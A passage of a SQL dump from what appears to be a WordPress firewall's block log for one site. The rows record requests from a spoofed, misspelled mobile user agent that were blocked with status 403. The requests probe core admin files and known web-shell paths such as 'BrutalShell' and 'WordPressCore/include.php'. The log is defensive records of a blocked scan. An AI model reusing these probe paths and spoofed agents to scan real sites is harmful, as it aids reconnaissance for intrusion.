User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21lZGlhLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133344,1699888638.238891,1699888638.229900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/file.php','http://eckankar-colorado.org/wp-admin/includes/file.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2ZpbGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133345,1699888637.906082,1699888637.896600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/export.php','http://eckankar-colorado.org/wp-admin/includes/export.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2V4cG9ydC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133346,1699888637.551640,1699888637.542700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/edit-tag-messages.php','http://eckankar-colorado.org/wp-admin/includes/edit-tag-messages.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2VkaXQtdGFnLW1lc3NhZ2VzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133385,1699888623.928621,1699888623.919000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-debug-data.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-debug-data.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWRlYnVnLWRhdGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133387,1699888623.256803,1699888623.247500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-comments-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-comments-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWNvbW1lbnRzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133384,1699888624.266616,1699888624.251800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-base.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-base.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWZpbGVzeXN0ZW0tYmFzZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133386,1699888623.593943,1699888623.577800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-community-events.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-community-events.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWNvbW11bml0eS1ldmVudHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133388,1699888622.908716,1699888622.899700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-automatic-updater.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-automatic-updater.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWF1dG9tYXRpYy11cGRhdGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133383,1699888624.615041,1699888624.606100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-direct.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-direct.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWZpbGVzeXN0ZW0tZGlyZWN0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133341,1699888639.335382,1699888639.324600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/import.php','http://eckankar-colorado.org/wp-admin/includes/import.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2ltcG9ydC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133217,1699888689.409837,1699888689.401100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/twentyfive/','http://eckankar-colorado.org/wp-content/themes/twentyfive/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWZpdmUv\",\"category\":\"brute-force\",\"ssl\":1}'),(133197,1699888477.117890,1699888477.107500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template-utils.php','http://eckankar-colorado.org/wp-includes/block-template-utils.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLXV0aWxzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133239,1699888681.323659,1699888681.309200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/BrutalShell/','http://eckankar-colorado.org/wp-content/plugins/BrutalShell/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9CcnV0YWxTaGVsbC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133174,1699888485.485123,1699888485.476000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-walker-category-dropdown.php','http://eckankar-colorado.org/wp-includes/class-walker-category-dropdown.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdhbGtlci1jYXRlZ29yeS1kcm9wZG93bi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133247,1699888678.622858,1699888678.612800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp/wp-admin/includes/','http://eckankar-colorado.org/wp/wp-admin/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWFkbWluL2luY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133248,1699888678.288328,1699888678.274200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff/Renderer.php','http://eckankar-colorado.org/wp-includes/Text/Diff/Renderer.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9SZW5kZXJlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133246,1699888678.967543,1699888678.958900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/cache-wordpress/','http://eckankar-colorado.org/cache-wordpress/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NhY2hlLXdvcmRwcmVzcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133189,1699888480.011296,1699888480.002700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/capabilities.php','http://eckankar-colorado.org/wp-includes/capabilities.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NhcGFiaWxpdGllcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133527,1699888567.356846,1699888567.335100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-introspectionserver.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-introspectionserver.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItaW50cm9zcGVjdGlvbnNlcnZlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134292,1700046010.609192,1700046010.597900,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133535,1699888564.286073,1699888564.277300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.tag.id3v1.php','http://eckankar-colorado.org/wp-includes/ID3module.tag.id3v1.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS50YWcuaWQzdjEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133534,1699888564.624015,1699888564.615300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.tag.id3v2.php','http://eckankar-colorado.org/wp-includes/ID3module.tag.id3v2.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS50YWcuaWQzdjIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133533,1699888564.957027,1699888564.948300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.tag.lyrics3.php','http://eckankar-colorado.org/wp-includes/ID3module.tag.lyrics3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS50YWcubHlyaWNzMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133495,1699888580.402078,1699888580.393100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-code-editor-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-code-editor-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY29kZS1lZGl0b3ItY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133488,1699888582.957199,1699888582.948500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-header-image-setting.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-header-image-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 